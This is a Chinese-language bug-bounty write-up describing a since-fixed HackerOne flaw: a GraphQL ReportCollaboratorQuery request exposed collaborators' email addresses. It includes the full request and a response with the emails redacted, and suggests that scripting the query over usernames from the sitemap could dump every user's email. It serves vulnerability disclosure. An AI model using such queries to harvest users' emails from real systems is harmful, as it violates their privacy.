赏金7500美金,获取HackerOne任何用户的电子邮件地址漏洞
严重性:高 (7.5)
弱点:敏感信息泄露
赏金:重复(第一位研究员收到 7,500 美元)
分享一下我最近在 HackerOne 自己的漏洞赏金计划中的发现。这个发现非常简单
在 HackerOne 上提交报告后,我将我的兄弟r3y添加到协作者中,并观察到添加协作者的UI发生了更改 见下文。
添加协作者时的新用户界面
当我看到更新时,我总是尝试使用它,因此我在添加协作者时捕获请求并观察这个新的 GraphQL 查询“operationName”:“ReportCollaboratorQuery”
在检查返回包后,我注意到所有合作者的电子邮件地址都被返回了,尽管我使用他们的 hackerone 用户名只是为了邀请他们参与报告。
POST /graphql HTTP/2
Host: hackerone.com
Cookie: <redacted>
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:<redacted>
Content-Type: application/json
X-Csrf-Token: <redacted>
X-Product-Area: other
X-Product-Feature: other
Content-Length: 832
Origin: https://hackerone
<SNIP>
{
"operationName": "ReportCollaboratorQuery",
"variables": {
"reportId": <report-id>
},
"query": "query ReportCollaboratorQuery($reportId: Int!) {n report(id: $reportId) {n report_collaborators {n total_countn edges {n node {n idn user {n idn usernamen __typenamen }n bounty_weightn __typenamen }n __typenamen }n __typenamen }n report_collaborator_invitations {n total_countn edges {n node {n idn staten emailn bounty_weightn recipient {n idn usernamen __typenamen }n __typenamen }n __typenamen }n __typenamen }n __typenamen }n}n"
}HTTP/2 200 OK
Date: Wed, 21 Jun 2023 03:33:47 GMT
Content-Type: application/json; charset=utf-8
Cache-Control: no-store
Content-Disposition: inline; filename="response."
Vary: Accept
X-Request-Id: 31ef2c4f-e8fc-4544-b35d-bc219dd0ef64
Etag: W/"dbca3c53eb2d3558eca2c2735192ca7f"
Set-Cookie: <redacted>
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Xss-Protection: 1; mode=block
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: strict-origin-when-cross-origin
<SNIP>
{
"data": {
"report": {
"report_collaborators": {
"total_count": 4,
"edges": [
{
"node": {
"id": "Z2lkOi8vaGFja2Vyb25lL1JlcG9ydENvbGxhYm9yYXRvci8zNzkzMQ==",
"user": {
"id": "Z2lkOi8vaGFja2Vyb25lL1VzZXIvMjU0OTI1Mw==",
"username": "submit-a-security-vulnerabilit",
"__typename": "User"
},
"bounty_weight": 0.01,
"__typename": "ReportCollaborator"
},
"__typename": "ReportCollaboratorEdge"
},
{
"node": {
"id": "Z2lkOi8vaGFja2Vyb25lL1JlcG9ydENvbGxhYm9yYXRvci8zNzAxNQ==",
"user": {
"id": "Z2lkOi8vaGFja2Vyb25lL1VzZXIvMTU4Mzg0",
"username": "r3y",
"__typename": "User"
},
"bounty_weight": 0.01,
"__typename": "ReportCollaborator"
},
"__typename": "ReportCollaboratorEdge"
},
{
"node": {
"id": "Z2lkOi8vaGFja2Vyb25lL1JlcG9ydENvbGxhYm9yYXRvci8zNzAxNA==",
"user": {
"id": "Z2lkOi8vaGFja2Vyb25lL1VzZXIvODg2ODM=",
"username": "syjane",
"__typename": "User"
},
"bounty_weight": 0.01,
"__typename": "ReportCollaborator"
},
"__typename": "ReportCollaboratorEdge"
},
{
"node": {
"id": "Z2lkOi8vaGFja2Vyb25lL1JlcG9ydENvbGxhYm9yYXRvci8zNzAxMw==",
"user": {
"id": "Z2lkOi8vaGFja2Vyb25lL1VzZXIvNzgzNDc=",
"username": "japz",
"__typename": "User"
},
"bounty_weight": 1,
"__typename": "ReportCollaborator"
},
"__typename": "ReportCollaboratorEdge"
}
],
"__typename": "ReportCollaboratorConnection"
},
"report_collaborator_invitations": {
"total_count": 3,
"edges": [
{
"node": {
"id": "Z2lkOi8vaGFja2Vyb25lL0ludml0YXRpb25zOjpSZXBvcnRDb2xsYWJvcmF0b3IvNDI0NTI1OQ==",
"state": "accepted",
"email": "<redacted>@gmail.com",
"bounty_weight": 0.01,
"recipient": {
"id": "Z2lkOi8vaGFja2Vyb25lL1VzZXIvODg2ODM=",
"username": "<redacted>",
"__typename": "User"
},
"__typename": "InvitationsReportCollaborator"
},
"__typename": "InvitedReportCollaboratorEdge"
},
{
"node": {
"id": "Z2lkOi8vaGFja2Vyb25lL0ludml0YXRpb25zOjpSZXBvcnRDb2xsYWJvcmF0b3IvNDI1MDcyMg==",
"state": "accepted",
"email": "<redacted>@gmail.com",
"bounty_weight": 0.01,
"recipient": {
"id": "Z2lkOi8vaGFja2Vyb25lL1VzZXIvMjU0OTI1Mw==",
"username": "<redacted>",
"__typename": "User"
},
"__typename": "InvitationsReportCollaborator"
},
"__typename": "InvitedReportCollaboratorEdge"
},
{
"node": {
"id": "Z2lkOi8vaGFja2Vyb25lL0ludml0YXRpb25zOjpSZXBvcnRDb2xsYWJvcmF0b3IvNDI0NTI1OA==",
"state": "accepted",
"email": "<redacted>@gmail.com",
"bounty_weight": 0.01,
"recipient": {
"id": "Z2lkOi8vaGFja2Vyb25lL1VzZXIvMTU4Mzg0",
"username": "r3y",
"__typename": "User"
},
"__typename": "InvitationsReportCollaborator"
},
"__typename": "InvitedReportCollaboratorEdge"
}
],
"__typename": "InvitedReportCollaboratorConnection"
},
"__typename": "Report"
}
}
}在黑客攻击的历史上(HackerOne),我知道这种类型的漏洞是高严重性的,因为它非常容易在没有用户交互的情况下被利用。
攻击者只需要目标用户名,黑客用户名列表可以在这里轻松找到:
https: //hackerone.com/sitemap
这意味着一个简单的 python 脚本可以转储所有与用户名完全绑定的 HackerOne 注册电子邮件地址。
我提交了漏洞,我设法知道第一个提交漏洞的是谁,因为他在 Twitter 上发布了他的报告ID 
几天后,我知道该漏洞已经解决
第一个提交这个漏洞的研究人员获得了 7,500 美元的奖励。
时间线:
2023 年 6 月 21 日 — 11:57:32 PST — 报告已提交
2023 年 6 月 22 日 — 14:15:29 PST — 报告标记为重复
2023 年 6 月 29 日 — 23:40:45 PST — 报告标记为已解决
推荐阅读:
实战 | 记一次赏金1.78万美金的Github未授权漏洞挖掘
原文始发于微信公众号(HACK学习呀):赏金7500刀 | 记一个获取HackerOne任何用户的电子邮件地址的漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论